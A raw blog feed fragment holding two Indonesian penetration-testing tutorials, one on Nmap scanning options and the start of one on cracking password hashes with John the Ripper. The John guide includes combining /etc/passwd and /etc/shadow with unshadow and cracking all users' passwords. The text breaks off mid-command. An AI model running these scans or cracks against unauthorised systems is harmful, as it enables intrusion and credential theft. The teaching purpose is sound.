&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Target Specification&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Nmap juga bisa menjalankan perintah secara lebih spesifik target dalam banyak format berbeda, termasuk alamat IP, ranges CIDR, dan tanda dash.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span&gt;$ nmap hostname&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;$ nmap 123.123.123.123&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;$ nmap 123.123.123.1/24&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;$ nmap 123.123.123.1–255&lt;/span&gt;&lt;/blockquote&gt;&lt;span&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Ping Sweeping&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Jika Anda hanya ingin menemukan host mana yang aktif, Anda menggabungkan scan dan ping dengan menambahkan -sn&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -sn 123.123.123.1/24&lt;/blockquote&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Terkadang ada beberapa host yang tidak merespon perintah ping, maka untuk skip ping check dan hanya penggunakan scan host port cukup menambahkan perintah -Pn&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -Pn host&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Scan Targets di sebuah file&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Untuk menjalankan perintah ini cukup menambahkan perintah -iL&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -iL ./hosts.txt&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Scan Types&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Di mode ini sebenarnya mempunyai 9 tipe, tetapi hanya mempunyai 2 perintah utama yaitu;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span&gt;TCP SYN (-sS)&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;UDP (-sU)&lt;/span&gt;&lt;/blockquote&gt;&lt;span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Jenis pemindaian default adalah TCP SYN. Untuk scan port UDP gunakan -sU. Jenis pemindaian lainnya dapat berguna untuk firewall tersembunyi tetapi dapat mengorbankan akurasi atau kecepatan. Kita dapat menemukan informasi lebih lanjut tentang berbagai jenis pemindaian nmap di sini&amp;nbsp;&lt;/span&gt;&lt;span&gt;https://nmap.org/book/man-port-scanning-techniques.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Specifying Ports&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;You can specify which ports to scan with -p. By default, only 1000 ports are scanned. To scan all ports:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Kita dapat menentukan port mana yang akan di scan dengan -p. Secara default, hanya 1000 port yang di scan. Untuk scan seluruh port bosa mengginakan perintah:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -p 1–65535 host&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Kita juga dapat menentukan daftar yang dipisahkan koma dengan port tunggal, range dan port UDP tertentu:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -p 23,23,25,110,80–90,U:53,1000–2000&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Version and OS Enumeration&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Ketika Nmap menemukan port terbuka, Nmap dapat memeriksa lebih jauh untuk menemukan layanan apa yang sedang dijalankan jika kita menentukan -sV. Kita dapat mengatur seberapa kuat probe yang kita inginkan dari O (probe ight, cepat tapi tidak akurat) hingga 9 (coba semua probe, lambat tapi akurat)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -sV — version-intensity 9&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Nmap dapat menebak sistem operasi mana yang dijalankan host berdasarkan hasil pemindaian aktifkan fitur ini dengan -O:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -O host&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Firewall Evasion&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Ia juga memiliki fungsi menghindari firewall yang ekstensif. Sejujurnya saya tidak pernah menggunakan fitur ini tetapi fitur ini memungkinkan kita melakukan beberapa hal keren termasuk memalsukan alamat sumber.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Output Formats&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Nmap menawarkan banyak output format. Beberapa lebih baik untuk dibaca manusia, yang lain lebih baik untuk diurai ke alat lain. Saya cenderung menampilkan pindaian ke semua format menggunakan.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span&gt;$ nmap -oA outputfile host&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Specific options include:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;-oN Normal&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;-oX XML&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;-oS scr1pt k1dd13&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;-oG greppable&lt;/span&gt;&lt;/blockquote&gt;&lt;span&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Scan Speed&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Kita juga dapat menyesuaikan kecepatan pemindaian nmap. menggunakan -T&amp;lt;0-5&amp;gt;. Angka yang lebih tinggi berarti kecepatan yang lebih tinggi.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Kecepatan yang lebih tinggi berarti akurasi yang lebih rendah, dan sebaliknya.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -T3 host&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;Nmap Scripting Engine&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;This is where Nmap gets really interesting! It can also run Lua scripts. These can do pretty much anything. Nmap comes with about 600 of them that perform various vuln scanning and enumeration tasks, but you can also code your own.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Di sinilah Nmap menjadi sangat menarik! Itu juga dapat menjalankan skrip Lua. Ini dapat melakukan hampir semua hal. Nmap hadir dengan sekitar 600 di antaranya yang melakukan berbagai pemindaian vuln dan scan pencacahan, tetapi kita juga dapat membuat kode sendiri.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Secara default lokasi script LUA ini berada di&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;&amp;lt;nmap directory&amp;gt;/share/nmap/scripts/*&lt;/blockquote&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Bergantung pada penyiapan kita, kita juga dapat membukanya dengan menjalankan&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;$ locate *.nse&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Sebagai contoh penggunaan skrip Nmap, untuk memeriksa apakah sebuah host rentan terhadap Eternal Blue, kita dapat menjalankan:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap --script=smb-vuln-cve-2017–7494 host&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Some scripts require arguments, you can specify them with --script-args=n1=v1,n2=v2 etc.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Beberapa skrip memerlukan argumen, kita dapat menentukannya dengan --script- args=n1=v1,n2=v2 dll.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Untuk mendapatkan bantuan tentang argumen mana yang dapat diterima oleh skrip:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap --script-help=scriptname&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;To upgrade your scripts to the latest and greatest, just run:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap --script-updatedb&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;A Nice Alias -A&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;A helpful alias is -A, which will enable OS detection, service version detection, script scanning, and traceroute.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Alias ​​h@pful adalah -A, yang akan mengaktifkan deteksi OS, pemindaian skrip deteksi versi layanan, dan traceroute&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;nmap -A host&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;My Go-To Command&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Untuk pemindaian menyeluruh dari satu host, perintah masuk yang layak adalah:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -A -p1–65535 -v host&lt;/blockquote&gt;&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;b&gt;A Few Hot Tips&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Ini hanyalah tip acak dari komentar tweet asli saya yang tidak sepenuhnya cocok dengan kategori lain tetapi terlalu berguna untuk diabaikan.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Jika pemindaian Anda memakan waktu lama dan Anda ingin lebih bertele-tele, tekan v&#39; saat pemindaian sedang berjalan. Anda dapat meningkatkannya beberapa langkah selama pemindaian. Tidak perlu menghentikan pemindaian untuk menambahkan &#39;v&quot;!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Convert Nmap XML output ke report friendly HTML gunakan xsltproc.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;sltproc &amp;lt;nmap-output.xml&amp;gt; -o &amp;lt;nmap-output.html&amp;gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;!--/data/user/0/com.samsung.android.app.notes/files/clipdata/clipdata_bodytext_221227_232906_170.sdocx--&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Jika Anda mengeluarkan ke file dengan -oN, -oG atau -oX, Anda dapat menghentikan pemindaian yang sedang berlangsung dan mengambil tepat di mana Anda tinggalkan nanti dengan menggunakan resume &amp;lt;file&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5189072202787971352'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5189072202787971352'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2022/12/mengenal-nmap.html' title='Dasar NMAP'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKC2Vp6LcmHZ97z4ofh2Zt-6P35u82u1oUlEupStiu72Ah8JyH5gtMxfHlNS6SXf7FIyCTML_4Mpd0lOw2TvEhWS8S_tgSAEydVsfXlpzxVDBHiYDRKMJeM2iljepBfsAAQqNm4y7qxI9tA6Ts7DNLCAIec2d6CyDddGNqmBB9bpgqR5ZzdruS5TTk/s72-w640-h336-c/nmap.png" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-9159055865067005562</id><published>2022-12-26T20:52:00.020-08:00</published><updated>2023-04-05T07:35:00.581-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="john the ripper"/><category scheme="http://www.blogger.com/atom/ns#" term="Note"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Dasar John The Ripper</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG-Qq63pbupxxJniEHA3j0w_IqK9xDaH6z2DjojTFPnAxJmwqOu43wpd1rxYaVsJmwdMw9amluNd67kmkuWNds4kP5Z0bviyG7yoLWL6UHKKHjTaw7-ttLYlcJFYuoXOJCD4VARjIj_hD9qQubx3RGaZsSd82iNO7RgN5e4anJLUqxBizBb7OD4oPJ/s875/john.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;485&quot; data-original-width=&quot;875&quot; height=&quot;354&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG-Qq63pbupxxJniEHA3j0w_IqK9xDaH6z2DjojTFPnAxJmwqOu43wpd1rxYaVsJmwdMw9amluNd67kmkuWNds4kP5Z0bviyG7yoLWL6UHKKHjTaw7-ttLYlcJFYuoXOJCD4VARjIj_hD9qQubx3RGaZsSd82iNO7RgN5e4anJLUqxBizBb7OD4oPJ/w640-h354/john.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Saya beranggapan bahwa pembaca saya sudah paham apa itu tools John the Ripper, karena saya tidak akan menjelaskan lagi apa itu John the Ripper dan seberapa pentingnya tools ini untuk melakukan tes penetrasi dan dimana anda dapat mendownload tools yang satu ini.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Oke, kita masuk pembahasan yang pertama,&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;John the Ripper Single Crack Mode&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Dalam mode ini John the Ripper memanfaatkan informasi yang tersedia dalam bentuk nama pengguna dan informasi lainnya. Ini bisa digunakan untuk meng-crack file password dengan format&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;Username:Password&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Saya ambil contoh, misalnya username nya adalah &quot;XyberNote&quot;, maka password yang akan di coba:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;xybernote&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;XYBERNOTE&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;xybernote1&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;x-ybernote&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;xybernote=&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Jadi untuk menggunakan John the Ripper dalam Single Crack Mode kita harus punya bank data yang berisi kumpulan password yang di simpan dalam file crack.txt dimana file ini di enkripsi dalam enkrupsi SHA1. Untuk menjalankan nya bisa menggunakan syntax:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;john [mode/option] [password file]&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;john --single --format=raw-sha1 crack.txt&lt;/p&gt;&lt;/blockquote&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;John the Ripper Wordlist Crack Mode&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Dalam mode ini John the ripper menggunakan daftar kata yang juga bisa disebut kamus yang membandingkan hash dari kata-kata yang ada di kamus dengan hash kata sandi. Kita dapat menggunakan daftar kata yang diinginkan. John juga hadir dengan password.lst yang berisi sebagian besar kata sandi umum.&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Mari kita lihat bagaimana John the Ripper crack password di Wordlist Crack Mode.&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Di sini kita memiliki file teks bernama crack.txt yang berisi nama pengguna dan kata sandi, di mana password tersebut dienkripsi dalam enkripsi SHA1 sehingga untuk menggunakannya bisa menggunakan syntax:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;john [wordlist] [options] [password file]&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Gimana? Paham atau malah bingung dengan penjelasan saya diatas? Hahaha...&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Baik, dari pada berbelit-belit mari kita demonstrasikan dua metode di atas, dimana saya akan coba crack dari user Linux. Sebelum itu kita harus mengerti terlebih dahulu apa itu shadow file.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Dalam sistem operasi Linux, file shadow password adalah file sistem tempat password pengguna terenkripsi disimpan. File ini terletak di /etc/shadow.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Metode Pertama&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Sekarang, untuk metode pertama, kita akan memecahkan kredensial pengguna &quot;pavan&quot; tertentu.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Dan kita akan menemukan kredensial pavan pengguna dan menyalinnya dan menempelkannya ke file teks.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Sekarang kita akan menggunakan john the ripper untuk memecahkannya.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john crack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Metode Kedua&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Sekarang, untuk metode kedua, kita akan bersama-sama memecahkan kredensial untuk semua pengguna.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Untuk melakukan ini, kita harus menggunakan utilitas ripper John yang disebut &quot;unshadow&quot;.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;unshadow /etc/passwd /etc/shadow &amp;gt; crack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;Di sini perintah unshadow menggabungkan file /etc/passwd dan /etc/shadow sehingga John dapat digunakan untuk memecahkannya. Kita menggunakan kedua file tersebut sehingga John dapat menggunakan informasi yang diberikan untuk memecahkan kredensial semua pengguna secara efisien.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Sekarang kita akan menggunakan john untuk memecahkan kredensial pengguna dari semua pengguna secara kolektif.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;text-align: left;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;span style=&quot;text-align: left;&quot;&gt;john --wordlist=/usr/share/john/password.lst crack.txt&lt;/span&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Menghentikan dan Memulihkan Cracking&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Sementara John the ripper bekerja untuk meretas beberapa kata sandi, kita dapat menghentikan atau menjeda peretasan dan Mengembalikan atau Melanjutkan Peretas lagi sesuai keinginan kami.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Jadi saat John the Ripper sedang berjalan, Anda dapat menginterupsi cracking dengan menekan &quot;q&quot; atau Crtl+C.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Sekarang untuk melanjutkan&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;atau mengembalikan proses cracking kita akan menggunakan opsi -restore dari John the ripper:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --restore&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Sekarang kami akan mendekripsikan berbagai HASH menggunakan John the Ripper&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;SHA1&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Untuk mendekripsi enkripsi SHA1 kami akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 